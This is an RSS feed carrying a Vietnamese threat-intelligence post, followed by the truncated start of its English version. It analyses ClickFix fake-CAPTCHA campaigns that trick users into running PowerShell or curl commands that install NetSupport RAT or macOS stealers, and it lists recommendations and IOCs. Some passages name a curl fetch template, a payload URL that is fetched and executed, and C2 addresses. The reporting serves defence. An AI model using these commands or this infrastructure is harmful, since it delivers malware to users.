Trong bối cảnh các cuộc tấn công mạng ngày càng tinh vi, một xu hướng đáng lo ngại đang dần nổi lên: kẻ tấn công không còn cần khai thác lỗ hổng hệ thống -họ khai thác chính người dùng. Chiế]]></description><link>https://blog.fiscybersec.com/b-n-ch-nh-l-l-h-ng-b-o-m-t-clickfix-ang-khi-n-ng-i-d-ng-t-c-i-malware</link><guid isPermaLink="true">https://blog.fiscybersec.com/b-n-ch-nh-l-l-h-ng-b-o-m-t-clickfix-ang-khi-n-ng-i-d-ng-t-c-i-malware</guid><category><![CDATA[Clickfix]]></category><category><![CDATA[macOS]]></category><category><![CDATA[Windows]]></category><category><![CDATA[Powershell]]></category><category><![CDATA[terminal]]></category><category><![CDATA[NetSupport RAT]]></category><category><![CDATA[fakecaptcha]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Lưu Tuấn Anh]]></dc:creator><pubDate>Sat, 04 Apr 2026 07:59:31 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/0bf671e5-69bb-4b39-ab94-c195b925793f.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Tổng quan</h2>
<p>Trong bối cảnh các cuộc tấn công mạng ngày càng tinh vi, một xu hướng đáng lo ngại đang dần nổi lên: <strong>kẻ tấn công không còn cần khai thác lỗ hổng hệ thống -họ khai thác chính người dùng</strong>. Chiến dịch <strong>ClickFix</strong> là minh chứng rõ ràng cho sự chuyển dịch này.</p>
<p>Được phát hiện bởi <strong>Recorded Future, ClickFix</strong> là một kỹ thuật tấn công dựa trên <strong>social engineering</strong>, trong đó nạn nhân bị lừa thực hiện các thao tác tưởng chừng vô hại — như sao chép và chạy một đoạn lệnh — nhưng thực chất lại vô tình kích hoạt mã độc trên chính thiết bị của mình. Không cần exploit, không cần malware phức tạp ngay từ đầu, toàn bộ chuỗi tấn công bắt đầu từ một hành động đơn giản của người dùng.</p>
<p>Điều khiến ClickFix trở nên nguy hiểm là khả năng <strong>vượt qua các cơ chế phòng thủ truyền thống</strong>. Khi chính người dùng chủ động thực thi lệnh, các giải pháp bảo mật như antivirus hay EDR thường khó phát hiện hành vi này là độc hại. Hơn nữa, các chiến dịch ClickFix hiện nay đã mở rộng phạm vi từ Windows sang cả macOS, cho thấy rõ xu hướng <strong>tấn công đa nền tảng</strong> và ngày càng tinh vi.</p>
<h2>Luồng thực hiện</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/83a6b53f-3b53-42d0-870c-6ebd1be4ceb3.png" alt="" style="display:block;margin:0 auto" />

<p>Các chiến dịch <strong>ClickFix</strong> thường tuân theo một quy trình tấn công có cấu trúc rõ ràng, gồm bốn giai đoạn liên tiếp - mỗi bước đều được tối ưu để khai thác hành vi người dùng và né tránh cơ chế phòng thủ truyền thống.</p>
<p><strong>Lure – Dụ dỗ bằng giao diện hợp pháp giả mạo</strong></p>
<p>Chuỗi tấn công bắt đầu bằng việc đánh lừa nạn nhân thông qua các giao diện quen thuộc như <strong>fake CAPTCHA</strong> hoặc hệ thống “human verification”. Những trang này được thiết kế tinh vi, tạo cảm giác đáng tin cậy và cấp bách, khiến người dùng tin rằng họ cần thực hiện một thao tác đơn giản để tiếp tục.</p>
<p><strong>Execution – Kích hoạt qua thao tác người dùng (LotL)</strong></p>
<p>Sau khi bị thuyết phục, nạn nhân được hướng dẫn sao chép và thực thi một đoạn lệnh đã được <strong>obfuscate (làm rối)</strong>.<br />Các lệnh này thường được chạy thông qua: <strong>Run (Windows) hoặc Terminal (Windows/macOS).</strong></p>
<p><strong>Remote Ingress – Tải payload từ hạ tầng điều khiển</strong></p>
<p>Khi lệnh được thực thi, hệ thống sẽ thiết lập kết nối ra bên ngoài để tải về các thành phần độc hại (payload staging). Quá trình này thường sử dụng: Shell nhúng, Script tải từ xa.</p>
<p><strong>In-Memory Execution – Thực thi không để lại dấu vết</strong></p>
<p>Ở giai đoạn cuối, mã độc được chạy trực tiếp trong bộ nhớ (<strong>in-memory execution</strong>) thay vì ghi xuống ổ đĩa. Điều này giúp chúng có thể hạn chế tối đa dấu vết forensic cũng như tránh bị phát hiện bởi các công cụ bảo mật dựa trên file.</p>
<h2><strong>Phân tích kỹ thuật chi tiết</strong></h2>
<p>Chiến dịch ClickFix lần này được chia thành nhiều cụm (cluster) với cách tiếp cận và kỹ thuật khác nhau, cho thấy mức độ <strong>nhắm mục tiêu rõ ràng</strong> và <strong>độ tinh vi cao trong việc triển khai payload</strong>.</p>
<h3>Cluster 1 – QuickBooks (Nhắm vào người dùng kế toán)</h3>
<p>Cụm này tập trung vào người dùng <strong>QuickBooks</strong>, chủ yếu là nhân sự kế toán hoặc tài chính. Kẻ tấn công sử dụng các trang giả mạo yêu cầu “khắc phục lỗi hệ thống” để dụ người dùng chạy lệnh.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/e9e564b7-8bd9-43e7-9583-73a81eed84c6.png" alt="" style="display:block;margin:0 auto" />

<p>Tại đây người dùng sẽ tự tay bật PowerShell với quyền Admin và chạy một tập lệnh do những kẻ tấn công thiết kế sẵn.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b9819f60-89fa-4ee0-bb39-5419018940de.png" alt="" style="display:block;margin:0 auto" />

<p>Sau khi nạn nhân đã thực hiện chạy lệnh trên thì lập tức Payload độc hại <code>"bibi.php"</code> và lưu nó vào thư mục <code>"%TEMP%"</code> dưới dạng <code>script.ps1</code>, giai đoạn này là bước thực hiện đầu tiên khởi động quá trình cài đặt <strong>NetSupport RAT.</strong></p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/8d41d234-359c-40a6-af0b-ed0c34722e5d.png" alt="" style="display:block;margin:0 auto" />

<p>Payload này liên tục kết nối đến đến địa chỉ C2: <em><strong>gologpoint[.]com - 62[.]164[.]177[.]230</strong></em> để nhận lệnh và tải xuống các tệp độc hại khác. Trong quá trình phân tích các chuyên gia đã ghi nhận bốn tệp độc hại bổ sung bao gồm</p>
<table>
<thead>
<tr>
<th><strong>Filename</strong></th>
<th><strong>SHA-256</strong></th>
</tr>
</thead>
<tbody><tr>
<td>at.7z</td>
<td>c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50</td>
</tr>
<tr>
<td>lnk.7z</td>
<td>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</td>
</tr>
<tr>
<td>7z.exe</td>
<td>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</td>
</tr>
<tr>
<td>7z.dll</td>
<td>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</td>
</tr>
</tbody></table>
<p><strong>NetSupport RAT</strong> sau khi được cài đặt attacker có thể thực hiện điều khiển máy từ xa, ghi lại màn hình, thao tác bàn phím cũng như cài thêm malware khác. Bên cạnh đó ở giai đoạn này kẻ tấn công cũng sẽ lấy đi toàn bộ thông tin nhạy cảm của khách hàng bao gồm: thông tin khách hàng, lịch sử giao dịch, thông tin thuế, tài chính...</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/951b9f12-25f4-4a92-acf8-6a5389f63836.png" alt="" style="display:block;margin:0 auto" />

<h3>Cluster 2 – Booking.com (Bẫy CAPTCHA giả)</h3>
<p>Cụm này nhắm vào người dùng dịch vụ đặt phòng như <a href="http://Booking.com">Booking.com</a>, sử dụng kỹ thuật giả CAPTCHA để tăng độ tin cậy. Tại đây người dùng được yêu cầu xác minh <strong>"KHÔNG PHẢI ROOT"</strong></p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b1413139-530a-4362-932d-9ad4ff3c767f.png" alt="" style="display:block;margin:0 auto" />

<p>Cũng giống với <strong>Cluster 1,</strong> thay vì CAPTCHA thật, trang được thiết kế bởi kẻ tấn công sẽ hướng dẫn bạn thực hiện mở PowerShell và chạy lệnh có chứa tham số: <code>"-ExecutionPolicy Bypass"</code>.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/37e1567a-71cc-446e-9e2a-b5df0436c064.png" alt="" style="display:block;margin:0 auto" />

<p>Với Command độc hại này kẻ tấn công có thể vô hiệu hóa chính sách bảo mật của PowerShell và cho phép chúng tải và thực thi script độc hại từ xa.</p>
<table>
<thead>
<tr>
<th><strong>Filename</strong></th>
<th><strong>SHA-256</strong></th>
</tr>
</thead>
<tbody><tr>
<td>at.7z</td>
<td>397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8</td>
</tr>
<tr>
<td>lnk.7z</td>
<td>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</td>
</tr>
<tr>
<td>7z.exe</td>
<td>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</td>
</tr>
<tr>
<td>7z.dll</td>
<td>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</td>
</tr>
</tbody></table>
<p>Trong suốt quá trình thực thi phần mềm độc hại cũng liên lạc liên tục với C2 để nhận lệnh và lưu trữ thông tin đánh cắp được.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/a3cd7076-0a4e-4637-a691-81544a3fe8ea.png" alt="" style="display:block;margin:0 auto" />

<p>Như đã nói thì điểm nguy hiểm ở đây chính là người dùng nghĩ mình đang làm bước bảo mật nhưng không, thực tế là <strong>tự mở cửa cho mã độc chạy.</strong></p>
<h3>Cluster 3 – Birdeye (Nhắm doanh nghiệp nhỏ)</h3>
<p>Cluster này nhắm vào các doanh nghiệp nhỏ sử dụng nền tảng đánh giá như Birdeye. Tại đây trang giả mạo chứa JavaScript được thiết kế để né tránh các hệ thống quét tự động (sandbox, crawler).</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/48e0ff4e-f05a-4e0b-9f19-355e426bf148.png" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/fe692233-c6e9-4c52-a1df-9696a50a30a0.png" alt="" style="display:block;margin:0 auto" />

<p>Ở phần này kẻ tấn công cũng chạy một lệnh <strong>PowerShell</strong> được viết dưới dạng "obfuscated" (làm rối mã) nhằm che giấu hành vi thực sự. Đây là một kỹ thuật thường thấy trong các cuộc tấn công mạng hoặc mã độc để tải và thực thi tập lệnh từ xa.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/e40fb76b-15c2-4677-a57c-51173090ed78.png" alt="" style="display:block;margin:0 auto" />

<p>Mục đích chính của nó là <strong>tải mã độc từ xa</strong> từ địa chỉ <code>https://alababababa.cloud/cVGvQio6.txt</code> sau đó thực thi trực tiếp nội dung tải về trên máy tính của nạn nhân.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/59338982-6514-4339-adbd-c70feb800e28.png" alt="" style="display:block;margin:0 auto" />

<h3>Cluster 4 &amp; 5 – macOS (Khai thác người dùng Mac)</h3>
<p>Hai cluster này tập trung vào người dùng macOS – nhóm thường ít bị nhắm đến hơn, nên dễ mất cảnh giác.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/7836ce4a-4a23-4bd4-9633-068760eb7a1e.png" alt="" style="display:block;margin:0 auto" />

<p>Người dùng bị hướng dẫn chạy lệnh <code>curl</code> trong Terminal: <code>"curl -kfsSL &lt;malicious_url&gt;"</code>. Trong đó tham số <code>-k</code> nhằm bỏ qua kiểm tra chứng chỉ TLS (có thể là server giả mạo), còn tham số <code>-fsSL</code> sẽ tải nội dung “im lặng”, không hiển thị lỗi.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b2bcf2ba-5c73-4b42-a93e-37f6dc88a831.png" alt="" style="display:block;margin:0 auto" />

<p>Payload sẽ được che giấu bằng chuỗi <strong>hex encoding, base64 encoding và ngay sau</strong> đó được giải mã và thực thi trực tiếp trên máy. Sau khi chạy tập lệnh sẽ tải và chạy <strong>MacSync Stealer.</strong> Mã độc này có nhiệm vụ đánh cắp thông tin trình duyệt cũng như cookie, credential, dữ liệu ví crypto.</p>
<p>Điểm đáng chú ý của chuỗi lây nhiễm này là khả năng tấn công trực tiếp vào Terminal (trusted interface), kẻ tấn công cũng tài tình lợi dụng tâm lý <strong>“Mac an toàn hơn Windows”.</strong></p>
<h2>Kết luận</h2>
<p>Chiến dịch ClickFix cho thấy sự kết hợp hiệu quả giữa <strong>social engineering và phân phối mã độc đa nền tảng</strong>, nhắm vào cả Windows và macOS thông qua các thương hiệu giả mạo như QuickBooks, Booking hay Apple.</p>
<p>Bằng cách lừa người dùng tự thực thi lệnh độc hại, kẻ tấn công có thể <strong>vượt qua các cơ chế bảo mật truyền thống</strong>, triển khai các mã độc như NetSupport RAT và Odyssey Stealer để chiếm quyền và đánh cắp dữ liệu.</p>
<h2>Khuyến nghị</h2>
<p><strong>Nhận diện và tránh ClickFix lừa đảo</strong></p>
<ul>
<li><p>Không làm theo các hướng dẫn yêu cầu:</p>
<ul>
<li><p>Mở <strong>Run (Win + R)</strong>, Terminal hoặc Command Prompt</p>
</li>
<li><p>Dán lệnh được cung cấp từ website/email</p>
</li>
</ul>
</li>
<li><p>Cảnh giác với các trang giả mạo thương hiệu như:</p>
<ul>
<li>QuickBooks, Booking, Apple, crypto sites</li>
</ul>
</li>
<li><p>Nếu thấy thông báo kiểu:</p>
<ul>
<li><p>“Fix lỗi hệ thống”</p>
</li>
<li><p>“Verify account”</p>
</li>
<li><p>“Install required update”</p>
</li>
</ul>
</li>
</ul>
<p><strong>Không tải hoặc chạy file không rõ nguồn gốc</strong></p>
<ul>
<li><p>Không tải:</p>
<ul>
<li>File <code>.exe</code>, <code>.dmg</code>, <code>.pkg</code>, <code>.zip</code> từ website lạ</li>
</ul>
</li>
<li><p>Không cài đặt phần mềm yêu cầu:</p>
<ul>
<li><p>Tắt antivirus</p>
</li>
<li><p>Cấp quyền admin bất thường</p>
</li>
</ul>
</li>
<li><p>Chỉ tải từ:</p>
<ul>
<li>Website chính thức hoặc App Store đáng tin cậy</li>
</ul>
</li>
</ul>
<p><strong>Kiểm tra URL trước khi đăng nhập</strong></p>
<ul>
<li><p>Kiểm tra kỹ domain:</p>
<ul>
<li><p>Tránh các domain có dạng:</p>
<ul>
<li><p><code>account-helpdesk[.]top</code></p>
</li>
<li><p><code>apple-diagnostic[.]wiki</code></p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>Luôn:</p>
<ul>
<li><p>Gõ tay URL thay vì click link</p>
</li>
<li><p>Kiểm tra HTTPS và chứng chỉ</p>
</li>
</ul>
</li>
</ul>
<p><strong>Bật bảo vệ tài khoản</strong></p>
<ul>
<li><p>Bật <strong>Multi-Factor Authentication (MFA)</strong> cho:</p>
<ul>
<li><p>Email</p>
</li>
<li><p>Tài khoản tài chính (QuickBooks, Booking)</p>
</li>
</ul>
</li>
<li><p>Sử dụng:</p>
<ul>
<li><p>Password mạnh, không dùng lại</p>
</li>
<li><p>Password manager nếu có thể</p>
</li>
</ul>
</li>
</ul>
<p><strong>Cập nhật hệ thống và phần mềm</strong></p>
<ul>
<li><p>Luôn cập nhật:</p>
<ul>
<li><p>Windows / macOS</p>
</li>
<li><p>Trình duyệt (Chrome, Edge, Safari)</p>
</li>
</ul>
</li>
<li><p>Vá lỗi giúp giảm nguy cơ bị khai thác</p>
</li>
</ul>
<p><strong>Cẩn trọng với email/phishing</strong></p>
<ul>
<li><p>Không click:</p>
<ul>
<li><p>Link từ email lạ</p>
</li>
<li><p>File đính kèm không rõ nguồn</p>
</li>
</ul>
</li>
<li><p>Kiểm tra:</p>
<ul>
<li><p>Người gửi (spoofed domain)</p>
</li>
<li><p>Nội dung gây áp lực (urgent, scare tactics)</p>
</li>
</ul>
</li>
</ul>
<h2><strong>MITRE ATT&amp;CK Mapping</strong></h2>
<table>
<thead>
<tr>
<th>Giai đoạn ClickFix</th>
<th>MITRE ATT&amp;CK Techniques</th>
</tr>
</thead>
<tbody><tr>
<td>Lure</td>
<td>T1566 (Phishing)</td>
</tr>
<tr>
<td>User Execution</td>
<td>T1204, T1059</td>
</tr>
<tr>
<td>Obfuscation &amp; LotL</td>
<td>T1027, T1218</td>
</tr>
<tr>
<td>Payload Delivery</td>
<td>T1105, T1071</td>
</tr>
<tr>
<td>In-Memory Execution</td>
<td>T1620, T1055</td>
</tr>
<tr>
<td>Data Theft</td>
<td>T1555, T1005</td>
</tr>
<tr>
<td>Exfiltration</td>
<td>T1041</td>
</tr>
</tbody></table>
<h2>IOCs</h2>
<h3>Intuit QuickBooks ClickFix</h3>
<p><strong>Domain</strong></p>
<p>4freepics[.]com anthonydee[.]com ariciversonille[.]com bancatangcode[.]com billiardinstitute[.]com cskhga6789[.]com customblindinstall[.]com deinhealthcoach[.]com elive123go[.]com elive777a[.]com extracareliving[.]com fomomforhealth[.]com grandmastertraders[.]traderslinkfx[.]com guypinions[.]com hostmaster[.]extracareliving[.]com mrinmay[.]net ned[.]coveney-ltd[.]com nhacaired88[.]com orkneygateway[.]com quiptly[.]com shopifyservercloud[.]com subsgoal[.]com suedfactoring[.]lit[.]com surecomforts[.]com theinvestworthy[.]com traderslinkfx[.]com ustazazharidrus[.]com visitbundala[.]com yvngvualr[.]com</p>
<p><strong>IP Addresses</strong></p>
<p>45[.]193[.]20[.]50 45[.]193[.]20[.]141 87[.]236[.]16[.]20 94[.]156[.]112[.]115 193[.]35[.]17[.]12 193[.]58[.]122[.]97 193[.]222[.]99[.]212</p>
<p><strong>Staging Domains</strong></p>
<p>nobovcs[.]com quicrob[.]com robovcs[.]com</p>
<p><strong>NetSupport RAT C2</strong></p>
<p>62[.]164[.]177[.]230</p>
<p><strong>File Hashes (NetSupport RAT)</strong></p>
<p>25865914ff0ec9421a5fa7dff2f680498f8893374f24d0b67a735bd8369299e9 280c7fb3033c6c34df88b61a4c90eb03e1ae7d1dc00355ca280a83903b776473 3f8202dacab7371e760e83b7d2b8fbd5d767f5bd408ed713ab0550c83ae82933 52f2813b9a7449946bdb98c171320d1801aa37a65903416c1aa186e44c66d745 56ebaf8922749b9a9a7fa2575f691c53a6170662a8f747faeed11291d475c422</p>
<h3><strong>Booking.com ClickFix</strong></h3>
<p><strong>Domains</strong></p>
<p>acconthelpdesk[.]com account-help[.]info account-helpdesk[.]icu account-helpdesk[.]info account-helpdesk[.]top accountmime[.]com accountpulse[.]help admin-activitycheck[.]com checkaccountactivity[.]com checkhelpdesk[.]com helpdeskpulse[.]com pulse-help-desk[.]com sign-in-op-token[.]com thepulseactivity[.]com thestayreserve[.]com</p>
<p><strong>IP Address</strong></p>
<p>91[.]1202[.]233[.]206</p>
<p><strong>Staging Domains</strong></p>
<p>bkng-updt[.]com checkpulses[.]com</p>
<p><strong>Staging IPs</strong></p>
<p>77[.]191[.]65[.]131 77[.]191[.]65[.]144</p>
<p><strong>NetSupport RAT C2 Domains</strong></p>
<p>hotelupdatesys[.]com chrm-srv[.]com ms-scedg[.]com</p>
<p><strong>NetSupport RAT C2 IP</strong></p>
<p>152[.]89[.]244[.]70</p>
<p><strong>File Hashes</strong></p>
<p>397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87 b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</p>
<h3><strong>Dual-Platform ClickFix (Windows + macOS)</strong></h3>
<p><strong>Domains</strong></p>
<p>appmacintosh[.]com appmacosx[.]com apposx[.]com appsmacosx[.]com appxmacos[.]com cryptoinfnews[.]com cryptoinfo-allnews[.]com cryptoinfo-news[.]com cryptonews-info[.]com financementure[.]com macapp-apple[.]com macapps-apple[.]com macosapp-apple[.]com macosx-app[.]com macosx-apps[.]com macosxapp[.]com macosxappstore[.]com macxapp[.]com macxapp[.]org valetfortesla[.]com</p>
<p><strong>IP Address</strong></p>
<p>45[.]144[.]233[.]192</p>
<p><strong>Staging IPs (Odyssey Stealer C2)</strong></p>
<p>45[.]135[.]232[.]33 217[.]119[.]139[.]117</p>
<p><strong>Hash (Odyssey Stealer)</strong></p>
<p>2e9356948f2214fbf12ab3e873e0057fb64764cb8ed9d1c82e7ab0b3eef92a37</p>
<h3>Birdeye ClickFix</h3>
<p><strong>Domains</strong></p>
<p>acebirdrep[.]com bebirdrank[.]com birdrankbox[.]com birdrankfx[.]com birdrankgo[.]com birdrankinc[.]com birdrankllc[.]com birdrankmax[.]com birdranktip[.]com birdrankup[.]com birdrankus[.]com birdrankusa[.]com birdrankvip[.]com birdrankzen[.]com birdrepbiz[.]com birdrepgo[.]com birdrephelp[.]com birdreplab[.]com birdrepsys[.]com birdrepusa[.]com birdrepuse[.]com bitbirdrank[.]com bitbirdrep[.]com fixbirdrank[.]com getbirdrank[.]com gobirdrank[.]com helpbirdrank[.]com helpbirdrep[.]com infobirdrep[.]com justbirdrank[.]com mybirdrank[.]com nowbirdrank[.]com optbirdrank[.]com probirdrep[.]com topbirdrank[.]com topbirdrep[.]com usbirdrank[.]com usebirdrep[.]com vipbirdrank[.]com</p>
<h3><strong>macOS Storage Cleaning ClickFix</strong></h3>
<p><strong>Domains</strong></p>
<p>apple[.]assistance-tools[.]com apple[.]diagnostic[.]wiki mac-os-helper[.]com macintosh-hub[.]com macos-storageperf[.]com stormac[.]lit[.]com</p>
<h2>Tham khảo</h2>
<p><a href="https://cybersecuritynews.com/new-clickfix-attack-leverage-windows-run-dialog-box/#google_vignette">New ClickFix Attack Leverage Windows Run Dialog Box and macOS Terminal to Deploy Malware</a></p>
<p><a href="https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos">ClickFix Campaigns Targeting Windows and macOS</a></p>
]]></content:encoded></item><item><title><![CDATA[You are the "security vulnerability": ClickFix is causing users to install malware themselves.]]></title><description><![CDATA[Overview
Amid increasingly sophisticated cyberattacks, a worrying trend is emerging: attackers no longer need to exploit system vulnerabilities—they exploit the users themselves. The ClickFix campaign]]></description><link>https://blog.fiscybersec.com/you-are-the-security-vulnerability-clickfix-is-causing-users-to-install-malware-themselves</link><guid isPermaLink="true">https://blog.fiscybersec.com/you-are-the-security-vulnerability-clickfix-is-causing-users-to-install-malware-themselves</guid><category><![CDATA[Clickfix]]></category><category><![CDATA[macOS]]></category><category><![CDATA[Windows]]></category><category><![CDATA[Powershell]]></category><category><![CDATA[terminal]]></category><category><![CDATA[NetSupport RAT]]></category><category><![CDATA[fakecaptcha]]></category><category><![CDATA[threat intelligence]]></category><dc:creator><![CDATA[Lưu Tuấn Anh]]></dc:creator><pubDate>Sat, 04 Apr 2026 07:57:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/1ef9cd4e-1e3e-4819-80da-e1a15b2f1deb.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Overview</h2>
<p>Amid increasingly sophisticated cyberattacks, a worrying trend is emerging: attackers no longer need to exploit system vulnerabilities—they exploit the users themselves. The ClickFix campaign clearly demonstrates this shift.</p>
<p>Discovered by Recorded Future, ClickFix is a social engineering attack technique where victims are tricked into performing seemingly harmless actions—like copying and running a script—but actually end up inadvertently activating malware on their own devices. No exploit or complex malware is needed from the start; the entire attack chain begins with a simple user action.</p>
<p>What makes ClickFix dangerous is its ability to bypass traditional defense mechanisms. When users themselves execute commands, security solutions like antivirus or EDR often struggle to detect this behavior as malicious. Furthermore, current ClickFix campaigns have expanded from Windows to macOS, clearly indicating a trend toward increasingly sophisticated cross-platform attacks.</p>
<h2>Execution flow</h2>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/83a6b53f-3b53-42d0-870c-6ebd1be4ceb3.png" alt="" style="display:block;margin:0 auto" />

<p>ClickFix campaigns typically follow a clearly structured attack process consisting of four consecutive stages—each step is optimized to exploit user behavior and evade traditional defense mechanisms.</p>
<p><strong>Lure – Entice with Fake Legitimate Interfaces</strong> The attack chain begins by deceiving victims through familiar interfaces like fake CAPTCHAs or "human verification" systems. These pages are intricately designed to appear trustworthy and urgent, making users believe they need to perform a simple action to proceed.</p>
<p><strong>Execution – Activation through User Interaction (LotL)</strong> After being convinced, victims are instructed to copy and execute an obfuscated script. These commands are typically run via: Run (Windows) or Terminal (Windows/macOS).</p>
<p><strong>Remote Ingress – Download payload from control infrastructure</strong> When the command is executed, the system establishes an external connection to download malicious components (payload staging). This process typically uses: Embedded shell, Remote download script. <strong>In-Memory Execution – Execute without leaving traces</strong> In the final stage, the malware runs directly in memory (in-memory execution) instead of being written to disk. This minimizes forensic traces and helps avoid detection by file-based security tools.</p>
<h2>Detailed technical analysis</h2>
<p>The ClickFix campaign is divided into several clusters with different approaches and techniques, demonstrating a clear level of targeting and high sophistication in payload deployment.</p>
<h3>Cluster 1 – QuickBooks (Targeting accounting users)</h3>
<p>This cluster focuses on QuickBooks users, primarily accounting or finance personnel. The attacker uses fake pages requesting "system error fixes" to trick users into executing commands.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/e9e564b7-8bd9-43e7-9583-73a81eed84c6.png" alt="" style="display:block;margin:0 auto" />

<p>Here, users manually launch PowerShell with Admin rights and run a script designed by the attackers.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b9819f60-89fa-4ee0-bb39-5419018940de.png" alt="" style="display:block;margin:0 auto" />

<p>Once the victim executes the command, the malicious payload <code>"bibi.php"</code> is immediately saved in the <code>"%TEMP%"</code> directory as script.ps1. This step initiates the installation process of NetSupport RAT.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/8d41d234-359c-40a6-af0b-ed0c34722e5d.png" alt="" style="display:block;margin:0 auto" />

<p>This payload continuously connects to the C2 address: gologpoint[.]com - 62[.]164[.]177[.]230 to receive commands and download other malicious files. During the analysis, experts recorded four additional malicious files, including</p>
<table>
<thead>
<tr>
<th><strong>Filename</strong></th>
<th><strong>SHA-256</strong></th>
</tr>
</thead>
<tbody><tr>
<td>at.7z</td>
<td>c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50</td>
</tr>
<tr>
<td>lnk.7z</td>
<td>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</td>
</tr>
<tr>
<td>7z.exe</td>
<td>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</td>
</tr>
<tr>
<td>7z.dll</td>
<td>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</td>
</tr>
</tbody></table>
<p>After NetSupport RAT is installed, the attacker can remotely control the computer, record the screen, manipulate the keyboard, and install additional malware. At this stage, the attacker also extracts all sensitive customer information, including customer details, transaction history, tax information, and financial data.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/951b9f12-25f4-4a92-acf8-6a5389f63836.png" alt="" style="display:block;margin:0 auto" />

<h3>Cluster 2 – Booking.com (Fake CAPTCHA Trap)</h3>
<p>This cluster targets users of booking services like Booking.com, using fake CAPTCHA techniques to increase credibility. Here, users are asked to verify "NOT A ROOT."</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b1413139-530a-4362-932d-9ad4ff3c767f.png" alt="" style="display:block;margin:0 auto" />

<p>Similar to Cluster 1, instead of a real CAPTCHA, the page designed by the attacker will instruct you to open PowerShell and run a command containing the parameter: "-ExecutionPolicy Bypass".</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/37e1567a-71cc-446e-9e2a-b5df0436c064.png" alt="" style="display:block;margin:0 auto" />

<p>With this malicious command, the attacker can disable PowerShell's security policy, allowing them to download and execute malicious scripts remotely.</p>
<table>
<thead>
<tr>
<th><strong>Filename</strong></th>
<th><strong>SHA-256</strong></th>
</tr>
</thead>
<tbody><tr>
<td>at.7z</td>
<td>397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8</td>
</tr>
<tr>
<td>lnk.7z</td>
<td>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</td>
</tr>
<tr>
<td>7z.exe</td>
<td>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</td>
</tr>
<tr>
<td>7z.dll</td>
<td>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</td>
</tr>
</tbody></table>
<p>Throughout the execution process, the malware continuously communicates with the C2 to receive commands and store the stolen information.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/a3cd7076-0a4e-4637-a691-81544a3fe8ea.png" alt="" style="display:block;margin:0 auto" />

<p>As mentioned, the danger here is that users believe they are performing a security step, but in reality, they are opening the door for malware to run.</p>
<h3>Cluster 3 – Birdeye (Targeting Small Businesses)</h3>
<p>This cluster targets small businesses using review platforms like Birdeye. Here, the fake page contains JavaScript designed to evade automated scanning systems (sandbox, crawler).</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/48e0ff4e-f05a-4e0b-9f19-355e426bf148.png" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/fe692233-c6e9-4c52-a1df-9696a50a30a0.png" alt="" style="display:block;margin:0 auto" />

